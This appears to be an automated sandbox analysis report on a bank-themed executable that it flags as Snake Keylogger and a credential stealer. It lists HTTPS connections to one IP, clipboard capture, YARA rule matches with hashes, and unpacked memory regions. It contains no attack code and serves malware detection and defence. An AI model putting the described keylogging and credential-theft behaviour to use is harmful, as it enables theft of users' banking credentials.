Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50127 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50129 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_00E7D344		0_2_00E7D344
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_072361EE		0_2_072361EE
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723F8EA		0_2_0723F8EA
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723D8F0		0_2_0723D8F0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07239500		0_2_07239500
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07239510		0_2_07239510
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07230560		0_2_07230560
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07230559		0_2_07230559
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723B020		0_2_0723B020
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723B010		0_2_0723B010
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_072390B8		0_2_072390B8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_072390D8		0_2_072390D8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723ABE8		0_2_0723ABE8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07239938		0_2_07239938
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_07239948		0_2_07239948
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723D8B8		0_2_0723D8B8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 0_2_0723D8E0		0_2_0723D8E0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AC146		5_2_011AC146
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A5362		5_2_011A5362
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AD278		5_2_011AD278
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AC468		5_2_011AC468
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AC738		5_2_011AC738
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AE988		5_2_011AE988
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A69A0		5_2_011A69A0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011ACA08		5_2_011ACA08
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A3AA1		5_2_011A3AA1
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A9DE0		5_2_011A9DE0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011ACCD8		5_2_011ACCD8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011ACFA9		5_2_011ACFA9
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A6FC8		5_2_011A6FC8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A3E09		5_2_011A3E09
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AE97B		5_2_011AE97B
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011AF961		5_2_011AF961
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A39EE		5_2_011A39EE
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_011A29EC		5_2_011A29EC
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A11E80		5_2_06A11E80
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A117A0		5_2_06A117A0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A10B30		5_2_06A10B30
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A15028		5_2_06A15028
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1FC68		5_2_06A1FC68
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19C70		5_2_06A19C70
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A12968		5_2_06A12968
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19548		5_2_06A19548
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1E6AF		5_2_06A1E6AF
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1E6B0		5_2_06A1E6B0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1EAF8		5_2_06A1EAF8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1DE00		5_2_06A1DE00
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A11E70		5_2_06A11E70
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1E24A		5_2_06A1E24A
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1E258		5_2_06A1E258
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A18BA0		5_2_06A18BA0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1F3A8		5_2_06A1F3A8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1F3B8		5_2_06A1F3B8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1178F		5_2_06A1178F
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A18B91		5_2_06A18B91
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19BFB		5_2_06A19BFB
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A10B20		5_2_06A10B20
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A19328		5_2_06A19328
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1EB08		5_2_06A1EB08
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1EF60		5_2_06A1EF60
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1EF51		5_2_06A1EF51
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1CCA0		5_2_06A1CCA0
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D0F8		5_2_06A1D0F8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1F802		5_2_06A1F802
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A10006		5_2_06A10006
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1F810		5_2_06A1F810
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A15018		5_2_06A15018
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A10040		5_2_06A10040
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D9A8		5_2_06A1D9A8
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D999		5_2_06A1D999
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1DDFF		5_2_06A1DDFF
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D540		5_2_06A1D540
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1D550		5_2_06A1D550
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Code function: 5_2_06A1295A		5_2_06A1295A

Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1797971019.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799143667.000000000289D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799143667.0000000002801000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000000.1742572689.000000000049A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameyGuK.exe@ vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1801804713.0000000005270000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1803104884.0000000007630000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4223830752.0000000006FF9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs denizbank 25.11.2024 E80 aspc.exe
Source: denizbank 25.11.2024 E80 aspc.exe	Binary or memory string: OriginalFilenameyGuK.exe@ vs denizbank 25.11.2024 E80 aspc.exe

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
